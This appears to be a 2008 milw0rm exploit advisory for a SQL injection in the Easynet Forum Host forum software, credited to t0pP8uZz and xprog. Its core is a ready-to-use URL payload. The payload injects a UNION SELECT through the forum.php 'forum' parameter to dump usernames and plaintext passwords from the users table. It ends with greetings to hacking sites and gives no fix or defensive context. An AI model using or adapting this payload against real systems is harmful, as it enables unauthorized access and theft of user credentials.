--==+================================================================================+==-- --==+ Easynet Forum Host SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz & xprog Discovered On: 5 April 2008 SCRIPT DOWNLOAD: N/A SITE: http://www.easynet4u.com/forum DORK: N/A DESCRIPTION: retrive users username and plaintext password. EXPLOITS: EXPLOIT 1: http://www.server.com/SCRIPT_PATH/forum.php?forum=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/* GREETZ: milw0rm.com, H4CK-Y0u.org, CipherCrew! --==+================================================================================+==-- --==+ Easynet Forum Host SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- # milw0rm.com [2008-04-05]